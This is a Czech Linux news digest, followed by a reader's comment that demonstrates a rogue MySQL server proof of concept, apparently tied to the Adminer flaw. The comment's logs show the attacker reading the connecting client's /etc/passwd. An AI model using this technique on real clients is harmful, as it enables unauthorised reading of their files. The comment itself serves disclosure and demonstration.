Certifikační autorita Let's Encrypt oznámila, že bude volitelně nabízet krátkodobé certifikáty s šestidenní platností a navíc s možností vystavit je na IP adresu. Zvolit typ certifikátu bude možné v certifikačním profilu ACME.
Herní konzole Nintendo Switch 2 byla oficiálně potvrzena. Vyjde letos. Trailer na YouTube. Více ve středu 2. dubna na Nintendo Direct.
Byl vydán Linux Mint 22.1 s kódovým jménem Xia. Podrobnosti v přehledu novinek a poznámkách k vydání. Linux Mint 22.1 bude podporován do roku 2029.
Google Chrome 132 byl prohlášen za stabilní. Nejnovější stabilní verze 132.0.6834.83 přináší řadu novinek z hlediska uživatelů i vývojářů. Podrobný přehled v poznámkách k vydání. Opraveno bylo 16 bezpečnostních chyb. Vylepšeny byly také nástroje pro vývojáře (YouTube).
Byla vydána verze 11.0.0 knihovny libvirt (Wikipedie) zastřešující různé virtualizační technologie a vytvářející jednotné rozhraní pro správu virtuálních strojů. Současně byl ve verzi 11.0.0 vydán související modul pro Python libvirt-python. Přehled novinek v poznámkách k vydání.
Byla vydána nová verze 3.4.0 nástroje pro inkrementální kopírování souborů rsync (Wikipedie). Přehled oprav a vylepšení v souboru NEWS. Řešeno je 6 zranitelností.
V srpnu loňského roku byla vyhlášena RP2350 Hacking Challenge aneb oficiální výzva Raspberry Pi na prolomení bezpečnosti mikrokontroléru RP2350. Povedlo se. Včera byli představeni čtyři vítězové a jejich techniky.
Na čem aktuálně pracují vývojáři open source operačního systému Haiku (Wikipedie)? Byl publikován přehled vývoje za prosinec 2024. Vypíchnuto je začlenění webového prohlížeče Iceweasel, tj. alternativního sestavení Firefoxu.
Tetris a DOOM běžící v pdf. Proč a jak v příspěvku na blogu.
Společnost Oracle představila sadu nástrojů a skriptů pro sběr a analýzu dat o stavu linuxových systémů a jejich ladění pod společným názvem Oracle Linux Enhanced Diagnostics (OLED). K dispozici pod licencí GPLv2.
Byly zveřejněny informace o bezpečnostní chybě v nástroji pro správu databází v jednom PHP souboru Adminer. Chyba je už půl roku opravena. Stačí Adminer aktualizovat.
Tiskni Sdílej:
attacker.py
.
Oběť:
Python 3.7.2 (default, Jan 3 2019, 02:55:40) [GCC 8.2.0] on linux Type "help", "copyright", "credits" or "license" for more information. >>> import MySQLdb >>> connection = MySQLdb.Connect(host='127.0.0.1', user='nsa', passwd='litomerice', db='catchmeifyoucan') Traceback (most recent call last): File "<stdin>", line 1, in <module> File "/usr/lib/python3/dist-packages/MySQLdb/__init__.py", line 86, in Connect return Connection(*args, **kwargs) File "/usr/lib/python3/dist-packages/MySQLdb/connections.py", line 266, in __init__ self.autocommit(autocommit) File "/usr/lib/python3/dist-packages/MySQLdb/connections.py", line 272, in autocommit _mysql.connection.autocommit(self, on) _mysql_exceptions.OperationalError: (2013, 'Lost connection to MySQL server during query') >>>Útočník vidí:
ACCEPT: ('127.0.0.1', 40422) > server greeting plen 204 received data: b'\x01\x8c\xa2\x9f\x00\x00\x00\x00@\x08\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00nsa\x00\x14\xd7\xfd \xdbj\x11\xe5\x8f\x14\x89\xeaa\x8a\xaf\xf2\xcc\x91\xea\xf7\xe0\xc4catchmeifyoucan\x00mysql_native_password\x00k\x03_os\x05Linux\x0c_client_name\nlibmariadb\x04_pid \x0519516\x0f_client_version\x053.0.8\t_platform\x06x86_64\x0c_server_host\t127.0.0.1' > auth accept plen 18 received data: b'\x00\x03SET autocommit=0' > exploit plen 3632 received data: b'\x02root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon: /usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys: [...]Testováno na aktuálních verzích v Debianu Unstable, je mi úplně fuk že to je binárně nekompatibilní s okolním světem, a taky je mi fuk, že to u oběti hodí exception a tudíž pokud to použijete v produkci, tak si toho všimne. Je to Poc.